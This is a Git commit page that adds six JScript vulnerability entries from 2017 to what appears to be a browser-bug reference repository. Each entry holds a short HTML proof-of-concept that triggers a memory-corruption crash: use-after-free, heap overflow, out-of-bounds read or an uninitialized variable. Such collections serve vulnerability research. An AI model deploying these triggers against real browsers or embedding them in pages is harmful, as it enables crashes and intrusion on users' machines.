Add some JScript bugs

tunz · Dec 23, 2017 · 7cc6c93 · 7cc6c93
1 parent 6393ca3
commit 7cc6c93
Show file tree

Hide file tree

Showing 7 changed files with 181 additions and 0 deletions.
diff --git a/README.md b/README.md
@@ -110,6 +110,17 @@ CVE Number | Feature | Keywords | Credit
 ---------- | ------- | -------- | ------
 [CVE-2014-1513](./spidermonkey/CVE-2014-1513.md) | TypedArray.subarray | OOB, Buffer Neutering, Side Effect | _Jüri Aedla_
 
+## JScript
+
+CVE Number | Feature | Keywords | Credit
+---------- | ------- | -------- | ------
+[CVE-2017-11793](./jscript/CVE-2017-11793.md) | JSON | Use After Free | _ifratric [[3]](#projectzero)_
+[CVE-2017-11855](./jscript/CVE-2017-11855.md) | Array.slice | Uninitialized Variable | _ifratric [[3]](#projectzero)_
+[CVE-2017-11890](./jscript/CVE-2017-11890.md) | RegExp | heap overflow | _ifratric [[3]](#projectzero)_
+[CVE-2017-11903](./jscript/CVE-2017-11903.md) | Array.join | Use After Free | _ifratric [[3]](#projectzero)_
+[CVE-2017-11906](./jscript/CVE-2017-11906.md) | RegExp | OOB | _ifratric [[3]](#projectzero)_
+[CVE-2017-11907](./jscript/CVE-2017-11906.md) | Array.sort | heap overflow | _ifratric [[3]](#projectzero)_
+
 ---
 <a name="qihoo360"></a>[1] Qihoo 360  
 <a name="keenlab"></a>[2] Tencent KeenLab  

diff --git a/jscript/CVE-2017-11793.md b/jscript/CVE-2017-11793.md
@@ -0,0 +1,31 @@
+# CVE-2017-11793
+
+- Report: Oct 2017
+- Fix: Dec 2017
+- Credit: ifratric of Google Project Zero
+
+## PoC
+
+```html
+<script language="Jscript.Encode">
+
+var o1 = {toJSON:function(){
+  alert('o1');
+  return [o2];
+}}
+
+var o2 = {toJSON:function(){
+  alert('o2');
+  CollectGarbage();
+  return 'x';
+}}
+
+JSON.stringify(o1);
+
+</script>
+```
+
+## Reference
+
+- [Microsoft](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11793)
+- [Google Project Zero](https://bugs.chromium.org/p/project-zero/issues/detail?id=1381)
diff --git a/jscript/CVE-2017-11855.md b/jscript/CVE-2017-11855.md
@@ -0,0 +1,20 @@
+# CVE-2017-11855
+
+- Report: Oct 2017
+- Fix: Dec 2017
+- Credit: ifratric of Google Project Zero
+
+## PoC
+
+```html
+<script language="Jscript.Encode">
+var x = new URIError(new Array(), undefined, undefined);
+String.prototype.localeCompare.call(x, new Date(0, 0, 0, 0, 0, 0, undefined));
+Array.prototype.slice.call(1);
+</script>
+```
+
+## Reference
+
+- [Microsoft](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11855)
+- [Google Project Zero](https://bugs.chromium.org/p/project-zero/issues/detail?id=1378)
diff --git a/jscript/CVE-2017-11890.md b/jscript/CVE-2017-11890.md
@@ -0,0 +1,27 @@
+# CVE-2017-11890
+
+- Report: Oct 2017
+- Fix: Dec 2017
+- Credit: ifratric of Google Project Zero
+
+## PoC
+
+```html
+<script language="Jscript.Encode">
+
+var s = 'a';
+for(var i=0;i<28;i++) {
+  s = s+s;
+}
+s = s+'[a-z]'+s;
+
+r = new RegExp();
+r.compile(s);
+
+</script>
+```
+
+## Reference
+
+- [Microsoft](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11890)
+- [Google Project Zero](https://bugs.chromium.org/p/project-zero/issues/detail?id=1369)
diff --git a/jscript/CVE-2017-11903.md b/jscript/CVE-2017-11903.md
@@ -0,0 +1,30 @@
+# CVE-2017-11903
+
+- Report: Oct 2017
+- Fix: Dec 2017
+- Credit: ifratric of Google Project Zero
+
+## PoC
+
+```html
+<script language="Jscript.Encode">
+
+var vars = new Array(100);
+for(var i=0;i<100;i++) vars[i] = {};
+
+function f() {
+  vars[1] = 1;
+  CollectGarbage();
+  return {};
+}
+
+vars[1].toString = f;
+Array.prototype.join.call(vars);
+
+</script>
+```
+
+## Reference
+
+- [Microsoft](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11903)
+- [Google Project Zero](https://bugs.chromium.org/p/project-zero/issues/detail?id=1376)
diff --git a/jscript/CVE-2017-11906.md b/jscript/CVE-2017-11906.md
@@ -0,0 +1,26 @@
+# CVE-2017-11906
+
+- Report: Oct 2017
+- Fix: Dec 2017
+- Credit: ifratric of Google Project Zero
+
+## PoC
+
+```html
+<script language="Jscript.Encode">
+
+function go() {
+  var r= new RegExp(Array(100).join('()'));
+  ''.search(r);
+  alert(RegExp.lastParen);
+}
+
+go();
+
+</script>
+```
+
+## Reference
+
+- [Microsoft](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11906)
+- [Google Project Zero](https://bugs.chromium.org/p/project-zero/issues/detail?id=1382)
diff --git a/jscript/CVE-2017-11907.md b/jscript/CVE-2017-11907.md
@@ -0,0 +1,36 @@
+# CVE-2017-11907
+
+- Report: Oct 2017
+- Fix: Dec 2017
+- Credit: ifratric of Google Project Zero
+
+## PoC
+
+```html
+<script language="Jscript.Encode">
+var vars = new Array(100);
+
+var arr = new Array(1000);
+for(var i=1;i<600;i++) arr[i] = i;
+
+var o = {toString:function() {
+  for(var i=600;i<1000;i++) {
+    arr[i] = 1337;
+  }
+}}
+
+function go() {
+  arr[0] = o;
+  Array.prototype.sort.call(arr);
+}
+
+
+go();
+
+</script>
+```
+
+## Reference
+
+- [Microsoft](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11907)
+- [Google Project Zero](https://bugs.chromium.org/p/project-zero/issues/detail?id=1383)